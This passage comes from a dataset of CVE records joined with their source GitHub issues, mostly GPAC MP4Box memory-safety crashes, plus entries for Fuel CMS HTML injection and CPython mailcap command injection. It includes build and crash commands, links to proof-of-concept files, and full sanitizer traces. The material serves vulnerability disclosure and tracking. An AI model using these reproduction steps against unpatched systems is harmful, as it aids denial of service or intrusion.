gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #233 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #234 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #235 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #236 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #237 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #238 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #239 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #240 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #241 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #242 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #243 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #244 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #245 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #246 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #247 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c #248 0x7de76e in gf_isom_get_sample_for_movie_time/programs/mp4box/builds/build10/src/isomedia/isom_read.c SUMMARY: AddressSanitizer: stack-overflow/programs/mp4box/builds/build10/src/isomedia/isom_intern.c:1108:8 in GetMediaTime ==5882==ABORTING ```
There is a statck-overflow detected by AddressSanitizer
https://api.github.com/repos/gpac/gpac/issues/2108/comments
0
2022-02-08T04:22:07Z
2022-02-08T15:23:20Z
https://github.com/gpac/gpac/issues/2108
1,126,776,763
2,108
CVE-2022-27146
2022-04-08T16:15:08.367
GPAC mp4box 1.1.0-DEV-rev1759-geb2d1e6dd-has a heap-buffer-overflow vulnerability in function gf_isom_apple_enum_tag.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2120" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2120
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## Description There is a heap buffer overflow detected by AddressSanitizer ## System info ``` Ubuntu 20.04.2 LTS clang version 12.0.0-++20210402082642+04ba60cfe598-1~exp1~20210402063359.71 MP4Box - GPAC version 1.1.0-DEV-rev1759-geb2d1e6dd-master ``` ## Build command ``` ./configure --static-mp4box --prefix=`realpath ./install` --enable-sanitizer --cc=clang --cxx=clang++ ``` ## crash command ``` MP4Box -frag 1 -out /dev/null poc_file ``` ## Pocs [poc.zip](https://github.com/gpac/gpac/files/8079653/poc.zip) ## Crash output ``` ==36294==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000014f5 at pc 0x0000007ed95d bp 0x7fff9dbe5110 sp 0x7fff9dbe5108 READ of size 1 at 0x6020000014f5 thread T0 #0 0x7ed95c in gf_isom_apple_enum_tag /programs/mp4box/builds/build15/src/isomedia/isom_read.c:4347:9 #1 0x1578ec6 in isor_declare_track /programs/mp4box/builds/build15/src/filters/isoffin_load.c:787:8 #2 0x1583b47 in isor_declare_objects /programs/mp4box/builds/build15/src/filters/isoffin_load.c:1453:3 #3 0xd05c0d in isoffin_initialize /programs/mp4box/builds/build15/src/filters/isoffin_read.c:485:8 #4 0xb74a43 in gf_filter_new_finalize /programs/mp4box/builds/build15/src/filter_core/filter.c:441:8 #5 0xb73120 in gf_filter_new /programs/mp4box/builds/build15/src/filter_core/filter.c:395:7 #6 0xb5e1bb in gf_fs_load_filter_internal /programs/mp4box/builds/build15/src/filter_core/filter_session.c:1293:13 #7 0x911528 in gf_media_fragment_file /programs/mp4box/builds/build15/src/media_tools/isom_tools.c:3789:6 #8 0x4e6fdc in mp4boxMain /programs/mp4box/builds/build15/applications/mp4box/main.c:6439:7 #9 0x7f7b5af220b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #10 0x41ea6d in _start (/programs/mp4box/builds/build15/bin/gcc/MP4Box+0x41ea6d) 0x6020000014f5 is located 0 bytes to the right of 5-byte region [0x6020000014f0,0x6020000014f5) allocated by thread T0 here: #0 0x499ccd in malloc (/programs/mp4box/builds/build15/bin/gcc/MP4Box+0x499ccd) #1 0x12c648d in databox_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_apple.c:247:22 #2 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9 #3 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14 #4 0x12c53c3 in ilst_item_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_apple.c:114:7 #5 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9 #6 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14 #7 0x12c4d35 in ilst_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_apple.c:47:8 #8 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9 #9 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14 #10 0x7affe3 in gf_isom_box_array_read_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1719:7 #11 0x132290a in meta_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_meta.c:106:13 #12 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9 #13 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14 #14 0x7affe3 in gf_isom_box_array_read_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1719:7 #15 0x12f6245 in udta_box_read /programs/mp4box/builds/build15/src/isomedia/box_code_base.c:8075:13 #16 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9 #17 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14 #18 0x7affe3 in gf_isom_box_array_read_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1719:7 #19 0x7ae1ed in gf_isom_box_read /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:1826:9 #20 0x7ae1ed in gf_isom_box_parse_ex /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:264:14 #21 0x7ad3c1 in gf_isom_parse_root_box /programs/mp4box/builds/build15/src/isomedia/box_funcs.c:38:8 #22 0x7c8dc1 in gf_isom_parse_movie_boxes_internal /programs/mp4box/builds/build15/src/isomedia/isom_intern.c:351:7 #23 0x7c8dc1 in gf_isom_parse_movie_boxes /programs/mp4box/builds/build15/src/isomedia/isom_intern.c:814:6 #24 0x7cd1a6 in gf_isom_open_file /programs/mp4box/builds/build15/src/isomedia/isom_intern.c:934:19 #25 0x4e14d6 in mp4boxMain /programs/mp4box/builds/build15/applications/mp4box/main.c:5968:12 #26 0x7f7b5af220b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /programs/mp4box/builds/build15/src/isomedia/isom_read.c:4347:9 in gf_isom_apple_enum_tag Shadow bytes around the buggy address: 0x0c047fff8240: fa fa fd fd fa fa fd fd fa fa fd fa fa fa 00 00 0x0c047fff8250: fa fa 00 00 fa fa 00 00 fa fa 00 04 fa fa 00 fa 0x0c047fff8260: fa fa 00 00 fa fa 00 00 fa fa 01 fa fa fa 00 00 0x0c047fff8270: fa fa 00 05 fa fa 00 00 fa fa 00 01 fa fa 00 00 0x0c047fff8280: fa fa 00 00 fa fa 02 fa fa fa 00 00 fa fa 00 02 =>0x0c047fff8290: fa fa 00 00 fa fa 00 04 fa fa 00 00 fa fa[05]fa 0x0c047fff82a0: fa fa 00 00 fa fa 02 fa fa fa 00 00 fa fa 00 fa 0x0c047fff82b0: fa fa 00 00 fa fa 00 00 fa fa 06 fa fa fa 00 00 0x0c047fff82c0: fa fa 02 fa fa fa 00 00 fa fa 02 fa fa fa 00 00 0x0c047fff82d0: fa fa 03 fa fa fa 00 00 fa fa 02 fa fa fa 00 00 0x0c047fff82e0: fa fa 00 00 fa fa 00 03 fa fa 00 00 fa fa 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==36294==ABORTING ```
There is a heap buffer overflow detected by AddressSanitizer
https://api.github.com/repos/gpac/gpac/issues/2120/comments
0
2022-02-16T11:57:40Z
2022-02-16T17:15:45Z
https://github.com/gpac/gpac/issues/2120
1,139,917,650
2,120
CVE-2022-27147
2022-04-08T16:15:08.407
GPAC mp4box 1.1.0-DEV-rev1727-g8be34973d-master has a use-after-free vulnerability in function gf_node_get_attribute_by_tag.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2109" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2109
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## Description There is a use-after-free detected by AddressSanitizer ## System info ``` Ubuntu 20.04.2 LTS clang version 12.0.0-++20210402082642+04ba60cfe598-1~exp1~20210402063359.71 MP4Box - GPAC version 1.1.0-DEV-rev1727-g8be34973d-master ``` ## Build command ``` ./configure --static-mp4box --prefix=`realpath ./install` --enable-sanitizer --cc=clang --cxx=clang++ ``` ## crash command ``` MP4Box -lsr -out /dev/null poc_file ``` ## Pocs [poc.zip](https://github.com/gpac/gpac/files/8020762/poc.zip) ## Crash output ``` ==28733==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000002bc0 at pc 0x000000721f36 bp 0x7ffec8945940 sp 0x7ffec8945938 READ of size 2 at 0x603000002bc0 thread T0 #0 0x721f35 in gf_node_get_attribute_by_tag/programs/mp4box/builds/build10/src/scenegraph/xml_ns.c:934:18 #1 0x70ca13 in gf_dom_listener_del/programs/mp4box/builds/build10/src/scenegraph/dom_events.c:161:6 #2 0x70ccaa in gf_dom_event_remove_all_listeners/programs/mp4box/builds/build10/src/scenegraph/dom_events.c:196:3 #3 0x5c54f5 in gf_node_free/programs/mp4box/builds/build10/src/scenegraph/base_scenegraph.c:1601:4 #4 0x6dac25 in gf_svg_node_del/programs/mp4box/builds/build10/src/scenegraph/svg_types.c:126:2 #5 0x5bf0f1 in gf_node_unregister/programs/mp4box/builds/build10/src/scenegraph/base_scenegraph.c:761:3 #6 0x5bfb17 in gf_sg_reset/programs/mp4box/builds/build10/src/scenegraph/base_scenegraph.c:479:3 #7 0x5be86d in gf_sg_del/programs/mp4box/builds/build10/src/scenegraph/base_scenegraph.c:162:2 #8 0x4eba5d in dump_isom_scene/programs/mp4box/builds/build10/applications/mp4box/filedump.c:221:2 #9 0x4e0bda in mp4boxMain/programs/mp4box/builds/build10/applications/mp4box/main.c:6146:7 #10 0x7f9d3ecb80b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #11 0x41ea6d in _start (/zhengjie/cmdline-fuzz/programs/mp4box/builds/build10/bin/gcc/MP4Box+0x41ea6d) 0x603000002bc0 is located 0 bytes inside of 24-byte region [0x603000002bc0,0x603000002bd8) freed by thread T0 here: #0 0x499a62 in free (/zhengjie/cmdline-fuzz/programs/mp4box/builds/build10/bin/gcc/MP4Box+0x499a62) #1 0x7215a7 in gf_node_delete_attributes/programs/mp4box/builds/build10/src/scenegraph/xml_ns.c:728:3 #2 0x6dac15 in gf_svg_node_del/programs/mp4box/builds/build10/src/scenegraph/svg_types.c:124:2 #3 0x5bf0f1 in gf_node_unregister/programs/mp4box/builds/build10/src/scenegraph/base_scenegraph.c:761:3 #4 0x5bfb17 in gf_sg_reset/programs/mp4box/builds/build10/src/scenegraph/base_scenegraph.c:479:3 #5 0x5be86d in gf_sg_del/programs/mp4box/builds/build10/src/scenegraph/base_scenegraph.c:162:2 #6 0x4eba5d in dump_isom_scene/programs/mp4box/builds/build10/applications/mp4box/filedump.c:221:2 #7 0x4e0bda in mp4boxMain/programs/mp4box/builds/build10/applications/mp4box/main.c:6146:7 #8 0x7f9d3ecb80b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) previously allocated by thread T0 here: #0 0x499ccd in malloc (/zhengjie/cmdline-fuzz/programs/mp4box/builds/build10/bin/gcc/MP4Box+0x499ccd) #1 0x72217c in gf_node_create_attribute_from_datatype/programs/mp4box/builds/build10/src/scenegraph/xml_ns.c:737:2 #2 0x72217c in gf_xml_create_attribute/programs/mp4box/builds/build10/src/scenegraph/xml_ns.c:541:9 #3 0x72217c in gf_node_get_attribute_by_tag/programs/mp4box/builds/build10/src/scenegraph/xml_ns.c:946:9 #4 0xaf1c3f in lsr_read_rare_full/programs/mp4box/builds/build10/src/laser/lsr_dec.c:1446:21 #5 0xaf01c7 in lsr_read_listener/programs/mp4box/builds/build10/src/laser/lsr_dec.c:4355:2 #6 0xb00747 in lsr_read_scene_content_model/programs/mp4box/builds/build10/src/laser/lsr_dec.c:4600:7 #7 0xaff8a0 in lsr_read_group_content/programs/mp4box/builds/build10/src/laser/lsr_dec.c:4785:8 #8 0xaeb4d9 in lsr_read_rectClip/programs/mp4box/builds/build10/src/laser/lsr_dec.c:3987:2 #9 0xb00752 in lsr_read_scene_content_model/programs/mp4box/builds/build10/src/laser/lsr_dec.c:4519:7 #10 0xaff8a0 in lsr_read_group_content/programs/mp4box/builds/build10/src/laser/lsr_dec.c:4785:8 #11 0xae55a4 in lsr_read_svg/programs/mp4box/builds/build10/src/laser/lsr_dec.c:4192:2 #12 0xadf7ae in lsr_read_command_list/programs/mp4box/builds/build10/src/laser/lsr_dec.c:5886:9 #13 0xaddbfb in lsr_decode_laser_unit/programs/mp4box/builds/build10/src/laser/lsr_dec.c:6133:6 #14 0xade67f in gf_laser_decode_command_list/programs/mp4box/builds/build10/src/laser/lsr_dec.c:230:6 #15 0xa356af in gf_sm_load_run_isom/programs/mp4box/builds/build10/src/scene_manager/loader_isom.c:307:10 #16 0x4eb9a1 in dump_isom_scene/programs/mp4box/builds/build10/applications/mp4box/filedump.c:203:14 #17 0x4e0bda in mp4boxMain/programs/mp4box/builds/build10/applications/mp4box/main.c:6146:7 #18 0x7f9d3ecb80b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-use-after-free/programs/mp4box/builds/build10/src/scenegraph/xml_ns.c:934:18 in gf_node_get_attribute_by_tag Shadow bytes around the buggy address: 0x0c067fff8520: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x0c067fff8530: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x0c067fff8540: fa fa fd fd fd fa fa fa fd fd fd fd fa fa fd fd 0x0c067fff8550: fd fa fa fa fd fd fd fa fa fa fd fd fd fd fa fa 0x0c067fff8560: fd fd fd fa fa fa fd fd fd fa fa fa 00 00 00 fa =>0x0c067fff8570: fa fa fd fd fd fd fa fa[fd]fd fd fa fa fa fd fd 0x0c067fff8580: fd fd fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x0c067fff8590: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x0c067fff85a0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x0c067fff85b0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x0c067fff85c0: fd fd fd fa fa fa fd fd fd fd fa fa fd fd fd fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==28733==ABORTING ```
There is a use-after-free detected by AddressSanitizer
https://api.github.com/repos/gpac/gpac/issues/2109/comments
0
2022-02-08T04:23:02Z
2022-02-08T15:23:20Z
https://github.com/gpac/gpac/issues/2109
1,126,777,303
2,109
CVE-2022-27148
2022-04-08T16:15:08.450
GPAC mp4box 1.1.0-DEV-rev1663-g881c6a94a-master is vulnerable to Integer Overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2067" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2067
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## Description There are some signed-integer-overflow caused runtime error and are detected by UndefinedBehaviorSanitizer ## System info ``` Ubuntu 20.04.2 LTS clang version 12.0.0-++20210402082642+04ba60cfe598-1~exp1~20210402063359.71 MP4Box - GPAC version 1.1.0-DEV-rev1663-g881c6a94a-master ``` ## Build command ``` ./configure --static-mp4box --prefix=`realpath ./install` --enable-sanitizer --cc=clang --cxx=clang++ ``` ## Crash command MP4Box -isma -timescale 600 -out /dev/null poc_file ## Pocs [POCs](https://drive.google.com/file/d/1MuTp6ebwU_2ybz1VJxJ0b6LSx-ISyGUX/view?usp=sharing) ## Crash output poc_3 ``` media_tools/av_parsers.c:5271:24: runtime error: signed integer overflow: 160041545 * 16 cannot be represented in type 'int' SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior media_tools/av_parsers.c:5271:24 in /zhengjie/collect/collec.sh: line 13: 9327 Aborted (core dumped) ``` poc_9 ``` [iso file] Box "oinf" size 15 (start 0) invalid (read 18) [iso file] Unknown top-level box type )85B691 [ODF] Error reading descriptor (tag 2 size 1): Invalid MPEG-4 Descriptor [iso file] Box "sinf" (start 635) has 81 extra bytes [ODF] Error reading descriptor (tag 2 size 1): Invalid MPEG-4 Descriptor [ODF] Not enough bytes (11) to read descriptor (size=81) [ODF] Error reading descriptor (tag 2 size 17): Invalid MPEG-4 Descriptor [iso file] Box "stco" (start 859) has 239 extra bytes [iso file] Box "stco" is larger than container box [iso file] Box "stbl" size 339 (start 536) invalid (read 578) [iso file] Unknown box type mvex in parent minf [iso file] Unknown box type moov in parent minf [iso file] Unknown box type 00000000 in parent minf [iso file] Unknown box type u7Fl in parent minf media_tools/av_parsers.c:5271:24: runtime error: signed integer overflow: 551209680 * 16 cannot be represented in type 'int' SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior media_tools/av_parsers.c:5271:24 in /zhengjie/collect/collec.sh: line 13: 16205 Aborted (core dumped) ``` poc_19 ``` media_tools/av_parsers.c:5271:24: runtime error: signed integer overflow: 414855863 * 16 cannot be represented in type 'int' SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior media_tools/av_parsers.c:5271:24 in /zhengjie/collect/collec.sh: line 13: 27854 Aborted (core dumped) ```
Signed integer overflow
https://api.github.com/repos/gpac/gpac/issues/2067/comments
1
2022-01-26T05:27:46Z
2022-01-27T10:41:15Z
https://github.com/gpac/gpac/issues/2067
1,114,645,297
2,067
CVE-2022-27156
2022-04-11T15:15:09.223
Daylight Studio Fuel CMS 1.5.1 is vulnerable to HTML Injection.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/daylightstudio/FUEL-CMS/issues/593" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "F3A806A2-582F-49B6-B9EC-C0FB4B13ED3D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/daylightstudio/FUEL-CMS/issues/593
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "daylightstudio", "FUEL-CMS" ]
A HTML Injection issue is affecting the application. STEP 1: ![image](https://user-images.githubusercontent.com/97121933/158069702-a53ac07c-433d-4303-bd4f-2b64d0c479a4.png) STEP 2: ![image](https://user-images.githubusercontent.com/97121933/158069639-b3af4292-e84b-4b1e-8fcd-e0fa7c6626eb.png)
HTML Injection Issue
https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/593/comments
2
2022-03-13T16:39:35Z
2022-07-30T22:42:59Z
https://github.com/daylightstudio/FUEL-CMS/issues/593
1,167,630,562
593
CVE-2015-20107
2022-04-13T16:15:08.937
In Python (aka CPython) up to 3.10.8, the mailcap module does not add escape characters into commands discovered in the system mailcap file. This may allow attackers to inject shell commands into applications that call mailcap.findmatch with untrusted input (if they lack validation of user-provided filenames or arguments). The fix is also back-ported to 3.7, 3.8, 3.9
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 8, "confidentialityImpact": "PARTIAL", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:C/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 8.5, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.6, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 4.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://bugs.python.org/issue24778" }, { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/python/cpython/issues/68966" }, { "source": "[email protected]", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00024.html" }, { "source": "[email protected]", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00039.html" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/46KWPTI72SSEOF53DOYQBQOCN4QQB2GE/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/53TQZFLS6O3FLIMVSXFEEPZSWLDZLBOX/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/57NECACX333A3BBZM2TR2VZ4ZE3UG3SN/" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DBVY4YC2P6EPZZ2DROOXHDOWZ4BJFLW/" }, { "source": "[email protected]", "tags": null, "url": 